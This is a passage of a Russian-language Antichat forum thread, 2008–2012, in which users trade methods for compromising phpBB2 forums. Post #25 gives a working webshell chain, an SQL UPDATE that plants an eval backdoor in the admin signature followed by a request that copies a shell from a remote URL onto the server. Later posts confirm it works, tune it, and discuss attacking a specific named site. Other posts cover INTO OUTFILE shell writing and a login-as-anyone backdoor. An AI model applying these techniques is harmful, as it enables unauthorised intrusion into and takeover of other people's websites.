HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.04.2008, 21:25
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Посмотрел логи апача... логи молчат. никаких соденений не устанавливалось на отдачу файлика db.txt
 
Ответить с цитированием

  #22  
Старый 27.04.2008, 00:26
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

А что делать если profile.php просто нету?
Цитата:
Not Found
The requested URL /phpBB2/profile.php was not found on this server.
 
Ответить с цитированием

  #23  
Старый 19.05.2008, 12:26
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию

Схожая проблема, только чуть сложнее
2.0.21 чистый (без модов).
Админка есть
нулевой байт экранируется
мускуль-иньекция в скрипте ЦМС (не пхпбб)
чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД (оказалось что иногда криворукость помогает))))
Не пойму другого:
стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x
Сервер мне только выдает строку в странице ту что после select но в файл не выводит
LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента.
Можно что то еще сделать по этим признакам?
спасибо
ЗЫ
Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд!

Последний раз редактировалось tmp; 22.05.2008 в 03:53..
 
Ответить с цитированием

  #24  
Старый 01.06.2008, 13:32
DiegoSun
Новичок
Регистрация: 06.12.2007
Сообщений: 1
Провел на форуме:
17618

Репутация: 0
По умолчанию

Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)
 
Ответить с цитированием

  #25  
Старый 11.04.2010, 18:06
$cr1pt
Новичок
Регистрация: 25.02.2010
Сообщений: 15
Провел на форуме:
33889

Репутация: 2
Отправить сообщение для $cr1pt с помощью ICQ
По умолчанию

проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;

далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');

Всё готово

Последний раз редактировалось $cr1pt; 11.04.2010 в 18:09..
 
Ответить с цитированием

  #26  
Старый 22.03.2012, 18:19
Spunoff
Guest
Сообщений: n/a
Провел на форуме:
9938

Репутация: 0
По умолчанию

Цитата:
Сообщение от $cr1pt  
$cr1pt said:
проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');
Всё готово
Спасибо, залился.

Всё перепробовал что только можно, а сделал как тут указано и всё ок.

П.С поэтому апнул тему...
 
Ответить с цитированием

  #27  
Старый 03.05.2012, 22:54
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Добавляю сигнатуру, захожу в профиль и вижу

Цитата:
Сообщение от None  
Warning: preg_replace() [function.preg-replace]: No ending delimiter '#' found in [path]/admin/admin_users.php on line 843
код, есесно, не выполняется.

посмотрел соурсы движка

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$signature[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig_bbcode_uid'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'#:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig_bbcode_uid'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'#si'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$signature[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$html_entities_match[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$html_entities_replace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$signature[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Видно, что регулярка идет не через "/", а через "#"

заменил (.+)/e на (.+)#e - ошибка исчезла, но код не выполняется.
 
Ответить с цитированием

  #28  
Старый 04.05.2012, 12:58
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от $cr1pt  
$cr1pt said:
проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');
Всё готово
Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,

Цитата:
Сообщение от None  
запрещено редактировать чужой профиль
код не выполняется ((

Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
 
Ответить с цитированием

  #29  
Старый 04.05.2012, 13:17
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,
код не выполняется ((
Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
сессию в гете нужно держать. Сайт случаем, не http://b******oi.ru?
 
Ответить с цитированием

  #30  
Старый 04.05.2012, 13:22
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
сессию в гете нужно держать. Сайт случаем, не http://b******oi.ru?
да)

ну тогда спортивный вопрос, как сессию держать в гете?

не хочешь не надо) но я его всё равно добью.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
webshell scripts -) blackybr PHP 20 28.03.2010 02:17
заливка шела через Koobi CMS vp$ Веб-уязвимости 2 14.06.2008 08:43
бэкап бд в phpBB2 Plus IGEMON Сценарии/CMF/СMS 6 09.02.2008 01:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ